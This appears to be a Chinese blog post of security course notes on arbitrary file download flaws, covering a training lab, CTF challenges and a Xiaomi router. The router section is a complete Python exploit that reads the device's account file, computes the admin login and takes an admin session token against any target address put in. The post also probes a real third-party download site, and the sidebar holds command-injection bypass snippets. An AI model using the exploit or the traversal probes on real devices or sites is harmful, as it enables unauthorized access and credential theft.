[小迪安全32天]文件下载

最新推荐文章于 2024-11-16 01:05:54 发布
最新推荐文章于 2024-11-16 01:05:54 发布
阅读量739 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 小迪安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54252904/article/details/117716475
本文探讨了文件下载漏洞在CTF竞赛中的应用,涉及网站目录探测、PHP文件注入、百度杯登录绕过、小米路由器敏感文件获取等内容,展示了渗透测试技术和常见漏洞利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件下载

在这里插入图片描述
通过文件下载,可以下载到目标网站的数据库配置文件或网站信息文件,对后续的渗透有很大帮助!

文件下载

靶场环境pikachu

在这里插入图片描述
右键点击图片链接查看
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=kb.png
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=ai.png
把filename的值改为上一层的php文件
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=…/execdownload.php
访问即可下载
在这里插入图片描述

同样可以在下载的文件中查找敏感文件信息进行下载

如何知道网站目录的信息结构:
通过扫描工具如御剑扫描,burpsuit,
只要字典足够好,什么都能扫得到!

判断

根据参数值

  • read.xxx?filename=
  • down.xxx?filename=
  • readfile.xxx?file=
  • downfile.xxx?file=
  • …/ …\ .\ ./等
  • %00 ? %23 %20 .等
  • &readpath=、&filepath=、&path=、&inputfile=、&url=、&data=、&readfile=、
  • &menu=、META-INF= 、WEB-INF

测试网站

只是练习,不搞破坏!
https://www.znds.com/

在这里插入图片描述
鼠标右键复制链接查看
http://down.znds.com/getdownurl/?s=L2Rvd24vMjAyMTA1MzEvdHhzcDE2MTU4XzcuNC4wLjEwMTBfZGFuZ2JlaS5hcGs=
base64解密后为

http://down.znds.com/getdownurl/s=/down/20210531/txsp16158_7.4.0.1010_dangbei.apk
如果把s后面的文件换成网络的php文件就能下载
下载时要把s后面的参数值进行base64加密

CTF考题

在这里插入图片描述
点击Help复制链接
在这里插入图片描述
filename=help.docx
很像文件下载
javaweb开放一般文件下载都以post方式进行提交
在这里插入图片描述
通过抓取数据包得知是javaweb开放
由于javaweb有WEB-INF/web.xml的配置问件
在这里插入图片描述
成功下载,打开获取flag!

漏洞文件下载

百度杯

挺难的!
https://www.ichunqiu.com/battalion?t=1&r=57475
在这里插入图片描述

登录密码抓包
把login修改为1
在这里插入图片描述

通过点击manage发送把login改为1获取数据包
在这里插入图片描述
module为网站模型框架
这个module涉及到文件下载漏洞,这里先留着,我不会,等以后解决!

小米路由器任意文件下载

https://www.seebug.org/vuldb/ssvid-98122
http://192.168.31.1/api-third-party/download/extdisks…/etc/shadow
直接在网站根目录下输入/api-third-party/download/extdisks…/etc/shadow
如果能获取文件就证明有漏洞
用python3执行

把里面的网址换成目标网址加端口

import os
import re
import time
import base64
import random
import hashlib
import requests
from Crypto.Cipher import AES

# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}

def get_mac():
    ## get mac
    r0 = requests.get("http://192.168.31.1/cgi-bin/luci/web", proxies=proxies)
    mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
    # print(mac)    
    return mac

def get_account_str():
    ## read /etc/config/account
    r1 = requests.get("http://192.168.31.1/api-third-party/download/extdisks../etc/config/account", proxies=proxies)
    print(r1.text)
    account_str = re.findall(r'admin\'? \'(.*)\'', r1.text)[0]
    return account_str

def create_nonce(mac):
    type_ = 0
    deviceId = mac
    time_ = int(time.time())
    rand = random.randint(0,10000)
    return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)

def calc_password(nonce, account_str):
    m = hashlib.sha1()
    m.update((nonce + account_str).encode('utf-8'))
    return m.hexdigest()

mac = get_mac()
account_str = get_account_str()
## login, get stok
nonce = create_nonce(mac)
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r2 = requests.post("http://192.168.31.1/cgi-bin/luci/api/xqsystem/login", 
    data = data, 
    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
    proxies=proxies)
# print(r2.text)
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
print("stok="+stok)

获取stok值

在这里插入图片描述

在这里插入图片描述
把stok值加;号拼到网址后面成功进入
在这里插入图片描述

【小安全】Day01基础入门-专业名词&文件上传下载及案例
2201_75772809的博客
04-21 603
> xiaodi8 防火墙。xiaodi8 防火墙 -> aliyun。内网 -> xiaodi8。——黑客工具:瑞士军刀。
【小安全第37】反序列化
weixin_54252904的博客
06-20 692
PHP反序列化 原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 serialize() //将一个对象转换成一个字符串 unserialize() //将字符串还原成一个对象 演示一把 上代码 改代码中接受以get方式传过来的str参数的值,并且如果该值经过反序列化之后的值如果等于$key(xiaodi)时就输出flag 因此我
2020-V6-小安全讲义和相关笔记.zip
08-24
2020.V6小安全讲义和相关笔记
安全学习笔记--第32:web漏洞-文件操作之文件下载读取全解
zr1213159840的博客
01-18 907
tips 文件被解析,是文件包含漏洞 显示源代码,是文件读取漏洞 提示文件下载,是文件下载漏洞 文件下载,读取的原理,检测,利用,修复等 文件下载:就是在一些网站存在下载的内容,但是如果不限制的话,会造成任意文件下载 文件读取:能够访问看一些代码 检测:扫描工具或者扫描地址或者下载好的文件代码中去分析路径和包含文件,还可以通过文件名,参数值,目录符号等等,如下图所示 利用:工具,暴力破解后下载 修复: 利用 数据库配置文件下载或读取后续 数据库配置文件会存在数据库账号密码的相关信息 接口密钥信息文件
安全--文件上传
wcwdnmdnmd的博客
08-18 400
文件上传
2021小web安全笔记全套.zip
08-16
安全圈子知名讲师 小 2021最新教学的课堂笔记 教程还是挺不错的,很好入门。教程也比较新,有新的waf绕过方法以及代码审计,还有新的工具和渗透思维。
2019小WEB安全渗透测试录像视频.txt
06-11
2019最新的直播教程录像,教程还是挺不错的,很好入门。教程也比较新,有新的waf绕过方法以及代码审计,还有新的工具和渗透思维。
《小安全》第13 SQL注入:Mysql注入
m0_56250796的博客
04-20 344
select 关键字过滤 $id = str_replace('select', 'fuck', $id) 但有时过滤关键字没有做大小写防护可以换 Select、SELECT尝试。
【小安全】第01:基础入门-概念名词
想努力,想追上在前面的人
12-15 474
萌新小白渗透测试学习中...欢迎一起交流探讨~!
32-WEB 漏洞-文件操作之文件下载读取全解
MCTSOG的博客
03-20 1601
导图 漏洞判断 1.文件被解析,则是文件包含漏洞 2.显示源代码,则是文件读取漏洞 3.提示文件下载,则是文件下载漏洞 任意文件下载 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞 漏洞产生原因 任意语言代码下载功能函数 漏洞检测 白盒检测 代码审计 Javaweb 文件下载代码 https://blog.youkuaiyun.com/Cheng_May/article/details/786
安全笔记,详细版本
01-23
安全笔记,详细版本,巨细无比
配套资料.zip
10-01
安全2020v6配套文档ppt
web漏洞“小安全课堂笔记”文件操作安全文件下载文件读取
weixin_42902126的博客
03-26 1069
文件操作安全文件下载文件读取思维导图文件下载作用#利用如何获取目标文件路径文件名,参数值,目录符号案例RoarCTF2019-文件下载真题复现-比赛百度杯2017二月-Zone真题复现-比赛拓展小米路由器远程任意文件读取漏洞 思维导图 文件下载 作用 下载文件,凡是存在文件下载的地方都可能存在文件下载漏洞。 例子pakachu 右键上图复制连接地址,获得下载地址。可以跨目录下载…/…/inc/function.php #利用 数据库配置文件下载或读取后续 inc/config.inc.php 接口
安全课程笔记 2024(七)
龙哥盟
11-16 947
呢讲这个pp。关于这个文件管理模块的那三节课呢,我们讲了这个上传和这个便利的事情啊,包括这个什么包含哪什么写入啊,删除啊,下载啊是吧,这些的一些安全问题呢,包括它的一些功能编写呢。就是我们今要讲的这个呢是我们一张截图,这个截图呢就是我提前给他做好的,大家可以看一下啊,这个就是我们那个写好的,就可以实现这个当前目录的一个便利,然后呢你可以打开里面看也是正常的是吧。
安全_基础
weixin_44060420的博客
06-08 1749
前后端,POC: 验证代码 判断是否存在漏洞EXP: 利用代码 (一般关注)Payload: 漏洞利用管道 载荷Shellcode:漏洞利用代码 与exp类似后门:统称Webshell:web后门木马 : 控制电脑病毒: 破坏电脑反弹:权限反弹,移交到其地方回显跳板黑盒测试:不知道源代码,具体情况黑盒测试: 知道源代码,大概情况 去测试暴力破解:社会工程学:社工 人为攻击撞库: 用已知的库 去试其他平台的密码等。
【小安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防31-34 -文件上传)
qq_46343633的博客
12-18 6008
1、文件上传-前端验证2、文件上传-黑白名单3、文件上传user.in妙用4、文件上传-PHP语言特性#详细点:1、检测层面:前端,后端等2、检测内容:文件头,完整性,二次渲染等3、检测后缀:黑名单,白名单,MME检测等4、绕过技巧:多后缀解析,截断,中间件特性,条件竟争等#本章课程内容:1、文件上传-CTF赛题知识点2、文件上传中间件解析&编辑器安全3、文件上传-实例CMS文件上传安全分析。
web漏洞“小安全课堂笔记”文件操作安全文件包含
weixin_42902126的博客
03-26 1089
安全课堂笔记文件包含思维导图原理白盒黑盒看参数及功能点本地包含无限制,跨目录../../www.txt![在这里插入图片描述](https://img-blog.csdnimg.cn/ff7ccb286a094fb8b81af7999f29eaa6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5aSn5LiN5Li6546L,size_20,color_FFFFFF,t_70,g_se,x_16
web漏洞“小安全课堂笔记”文件操作安全文件上传
weixin_42902126的博客
03-22 4146
思维导图 利用思路 什么是文件上传漏洞? 指程序对文件的上传未作全面的限制,导致用户可以上传一些超越用户权限的一些文件,可以是木 马,shell脚本,病毒等。 文件上传漏洞有哪些危害? 可以通过文件上传漏洞上传webshell后门。 文件上传漏洞如何查找及判断? 黑盒: 使用扫描工具扫描打开网站。 黑盒:测试会员中心,测试后台。 白盒:直接撸源代码。 文件上传漏洞有哪些需要注意的地方? 拿到漏洞后要对漏洞类型进行区分,编辑器、第三方应用、常规等。区分漏洞类型。 关于文件上传漏洞在实际应用中的说明? 上传
安全2023最新版笔记集合--续更
热门推荐
wushangyu32335的博客
02-19 1万+
安全2023最新笔记集合
安全30rce管道符
最新发布
03-20
### 小安全30RCE漏洞概述 远程代码执行(Remote Code Execution, RCE)是一种高危漏洞,允许攻击者通过网络向目标系统发送恶意代码并被执行。这种漏洞通常源于应用程序未能正确验证用户输入的数据,导致恶意数据被当作可执行代码处理[^2]。 在Web开发环境中,无论是基于Linux还是Windows系统的应用,都可能因不当使用某些危险函数而引发RCE漏洞。这些危险函数包括但不限于`eval()`、`exec()`、`shell_exec()`等。如果开发者未对传入的参数进行严格校验,则可能导致任意代码或命令被执行的情况发生[^3]。 对于检测手段而言,可以采用多种方式来发现潜在存在的RCE风险点。其中较为常见的有白盒测试中的静态代码分析即代码审计;而在黑盒渗透过程中则更多依赖于自动化扫描工具如AWVS、XRay等辅助完成初步排查工作之外还需要结合人工经验针对特定业务逻辑深入挖掘隐藏更深的安全隐患。 至于防御措施方面除了常规建议像及时更新补丁版本外还需特别注意以下几点:一是尽可能避免调用那些已知存在较高安全隐患的功能模块;二是加强对外部可控变量值范围的有效限制并通过正则表达式等方式进一步增强过滤机制强度;三是考虑部署专业的防火墙类产品作为额外防护层以抵御来自外界未知威胁入侵尝试。 ### 管道符的使用方法 管道符(`|`) 是一种用于连接两个程序的标准输出与标准输入之间的特殊字符,在Unix/Linux Shell编程中有广泛的应用场景之一就是构建复杂的命令链路实现单一指令难以达成的任务目的。例如当我们想要查找当前目录下所有扩展名为“.txt”的纯文本文件并将它们的内容按字母顺序排序最后保存到一个新的汇总文档当中去的时候就可以这样写: ```bash find . -name "*.txt" | xargs cat | sort > all.txt ``` 上述例子中第一个部分 `find . -name "*.txt"` 找到了符合条件的目标列表交给第二个环节 `xargs cat` 去读取具体每一个匹配项的实际内容再传递给第三个阶段 `sort` 完成最终整理动作之后重定向存储起来形成完整的操作流程[^4]。 另外值得注意的是有时候为了绕过一些简单的字符串替换型防护策略也可以巧妙运用反引号 `` 或者其他组合形式比如 `$()` 来达到相同的效果如下所示当直接书写 system('whoami') 被拦截时不妨试试下面这种方式或许就能奏效了呢? ```php <?php echo `whoami`; ?> ``` 或者是这样的PHP语句结构也能起到相应的作用: ```php $c='id'; echo shell_exec($c); ``` 以上两种情况均利用了不同语法特性规避掉了原始黑名单模式下的简单判断规则从而实现了预期功能需求[^5]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值